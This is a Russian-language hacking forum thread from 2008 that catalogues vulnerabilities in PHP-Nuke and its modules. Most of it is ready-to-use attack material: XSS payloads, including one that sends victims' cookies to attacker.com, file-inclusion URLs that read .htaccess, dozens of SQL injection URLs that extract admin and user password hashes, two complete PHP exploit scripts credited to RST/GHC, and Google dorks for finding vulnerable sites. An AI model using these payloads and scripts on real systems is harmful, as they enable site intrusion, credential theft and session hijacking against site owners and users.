Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[ Обзор уязвимостей PHP-Nuke ] |
19.01.2008, 02:20
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
[ Обзор уязвимостей PHP-Nuke ]
|
|
|
PHP-NUKE NukeSentinel Module |
19.01.2008, 03:05
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
PHP-NUKE NukeSentinel Module
Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.
[Local File Inclusion]
PHP код:
http://site/autohtml.php?filename=../file.php
http://site/autohtml0.php?filename=../file.php
[Information Leakage]
PHP код:
http://site/autohtml.php?filename=../.htaccess
http://site/autohtml0.php?filename=../.htaccess
С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов.
[Full path disclosure]
PHP код:
http://site/autohtml.php?filename=12345
На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту.
(c) MustLive <mustlive_(at)_websecurity.com.ua>
Последний раз редактировалось iddqd; 19.01.2008 в 03:22..
|
|
|
|
19.01.2008, 21:00
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
XSS
Код:
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
modules.php?name=Journal&file=friend&jid=2&yun=
modules.php?name=Journal&file=friend&jid=2&ye=
modules.php?name=Journal&file=add&filelist[]=
modules.php?name=Journal&file=modify&filelist[]=
modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
modules.php?name=Journal&file=comment&onwhat=
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
modules.php?name=Encyclopedia&op=terms&eid=1<r=
modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
modules.php?name=Encyclopedia&file=search&eid=
modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&url_title=foobar&url=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&cover=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&rlanguage=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&hits=
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&reviewer=
modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
modules.php?name=News&file=article&sid=1&optionbox=
modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
modules.php?name=NukeJokes&func=CatView&cat=
modules.php?name=NukeJokes&func=JokeView&jokeid=
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
modules.php?name=Downloads&d_op=viewsdownload&sid=
modules.php?name=Search&sid=
modules.php?name=Search&query=*&max=
modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
modules.php?name=Search&a=6&query=*&match=
modules.php?name=Search&query=*&mod3=
modules.php?name=Calendar&file=submit&type=
modules.php?name=Calendar&file=submit&op2=Preview&day=
modules.php?name=Calendar&file=submit&op2=Preview&month=
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
modules.php?name=Encyclopedia&file=index&op=terms&eid=1<r=
PHP код:
<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>
Search Module(all versions)
<img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
<iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <
Pool and News Module
PHP код:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"
SQL injection:
Код:
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/*
modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
Full Path Disclosure
modules.php?name=Reviews&rop=preview_review&title= f001&text=f002&score=9&email=00@b.org&reviewer=oob &date=00b
/modules/Web_Links/voteinclude.php
/modules.php?name=Statistics&op=convert_month
/modules.php?name=Journal&file=add&filelist=oob
/modules.php?name=Journal&file=modify&filelist=oob
/db/db.php
index.php?inside_mod=1
/modules.php?name=Downloads&d_op=menu
/modules.php?name=Web_Links&l_op=menu
modules.php?name=Web_Links&l_op=viewlink&cid=1&sho w=oob
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=oo b
modules.php?name=NukeJokes&func=CatView&cat=oob
modules.php?name=Downloads&d_op=viewdownload&cid=2 &show=oob
modules/Calendar/config.php
modules/Calendar/index.php
/modules/Calendar/submit.php
error.php?newlang=foobar
modules/coppermine/include/crop.inc.php
modules/coppermine/ecard.php
modules/coppermine/displayecard.php
modules/coppermine/db_input.php
modules/coppermine/config.php
modules/coppermine/addpic.php
modules/coppermine/phpinfo.php
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=fo obar
modules.php?name=NukeJokes&func=CatView&cat=foobar
modules.php?name=Video_Gallery&l_op=viewcat&catid= darkbicho
modules.php?name=Video_Gallery&l_op=viewclip&clipi d=darkbicho&catid=1
dork:
"create the Super User" "now by clicking here"
inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account
intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation"
"Warning: setlocale()"
intitle:PHP-nuke.powered.site "create * Super User" "now * clicking here"
"Powered by PHP-Nuke"
Copyright © 2003 by PHP-Nuke
"allinurl:modules.php sgallery"
"powered by phphnuke 6.0"
intitle:"PHP-Nuke Powered Site"
Последний раз редактировалось ettee; 20.01.2008 в 05:58..
|
|
|
|
PHP-Nuke <= 8.0 (sid) Remote SQL Injection |
23.01.2008, 02:52
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
PHP-Nuke <= 8.0 (sid) Remote SQL Injection
Remote SQL Injection
Vulnerable: PHP-Nuke <= 8.0
Exploit:
Код:
<?php
##########################################################
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################
if (isset($_POST['Submit'])){
$result=sendit('CONCAT("::",aid,"::",pwd,"::")');
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
{$ahash = $matches[2]; $aname = $matches[1];}
}
function sendit($param){
$prefix = $_POST['prefix'];
$data = $_POST['sql_text'];
$host = $_POST['hostname'];
$page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) die("$errstr ($errno)\n");
fputs($sock, "$method /$page HTTP/1.0\r\n");
fputs($sock, "Host: $host" . "\r\n");
fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-length: " . strlen($data) . "\r\n");
fputs($sock, "Referer: $ref_text". "\r\n");
fputs($sock, "User-Agent: $user_agent" . "\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "\r\n");
fputs($sock, "$data\r\n");
fputs($sock, "\r\n");
while (!feof($sock)) {
$result .= fgets ($sock,8192);
}
fclose($sock);
return $result;
}
?>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
<TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
<style>
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
</style>
<body bgcolor="#525254">
<form method=post>
<p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
<table width="900" border="0">
<tr bgcolor="#FFFFFF">
<td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
<td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url
</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font>
</strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930">SQL query</td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user
agent</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
<td bgcolor="#999999"><select name="method" size="1" id="method">
<option value="POST">POST</option>
<option value="GET">GET</option>
</select></td>
</tr>
<tr>
<td bgcolor="E39930"> </td>
<td bgcolor="#999999"> </td>
</tr>
</table>
<p>
<input type="submit" name="Submit" value="rock-n-roll">
</p>
</form>
<font size="2">(c) RST/GHC</font>
<hr size="3">
<?
# DEBUG
print $result;
?>
# milw0rm.com [2008-01-22]
|
|
|
|
23.01.2008, 10:59
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Remote SQL Injection
PHP-Nuke < 8.0
Exploit
Код:
<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+=========================================+
| RST/GHC unpublished PHP Nuke exploit <8 |
+=========================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';
if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}
/* few definitions */
if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
else {$prefix = $argv[3];}
switch ($argv[2]){
case "6":
$query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
$version = 6;
break;
default:
$query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
$version = 7;
break;
}
$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";
$result = file_get_contents($http);
preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Admin's Hash: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Exploit failed...";}
credits();
function credits(){
print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
print "\n\r+========================================+\n";
exit;
}
?>
# milw0rm.com [2008-01-22]
|
|
|
|
19.02.2008, 00:29
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability
example
Код:
http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}
EXPLOIT 1 :
Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
EXPLOİT 2 :
Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
(c)milw0rm.com
|
|
|
|
19.02.2008, 21:52
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PHP-Nuke Module Sections (artid) Remote SQL Injection
SQL Injection
Код:
Пример:
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
Код:
9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
Для поиска сайтов с этим модулем:
Код:
allinurl: "имя секции"
(c)
|
|
|
|
21.02.2008, 09:39
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PHP-NUKE Modules Okul v1.0 Remote SQL Injection
SQL Injection
Код:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
PHP-Nuke Module Inhalt (cid) SQL Injection
SQL Injection
Код:
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
(c) biyofrm.com
|
|
|
|
21.02.2008, 20:52
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection
SQL Injection
Код:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
PHP-Nuke Module Siir (id) Remote SQL Injection
SQL Injection
Код:
modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Для поиска
Код:
allinurl: modules-php-name-Siir
(c) s@bun
|
|
|
|
22.02.2008, 01:37
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection
PoC:
Код:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP, PERL, MySQL, JavaScript |
186 |
21.02.2010 02:41 |
|
BookS: PHP, PERL, MySQL, JavaScript, HTML, ajax, Веб Дизайн
|
M1nK0 |
PHP, PERL, MySQL, JavaScript |
10 |
27.06.2009 21:35 |
|
Что такое Php?
|
PAPA212 |
Болталка |
13 |
28.12.2007 20:44 |
|
Безопасность в Php, Часть Iii
|
k00p3r |
Чужие Статьи |
0 |
11.07.2005 19:02 |
|
Защищаем Php. Шаг за шагом.
|
k00p3r |
Чужие Статьи |
0 |
13.06.2005 11:31 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Комбинированный вид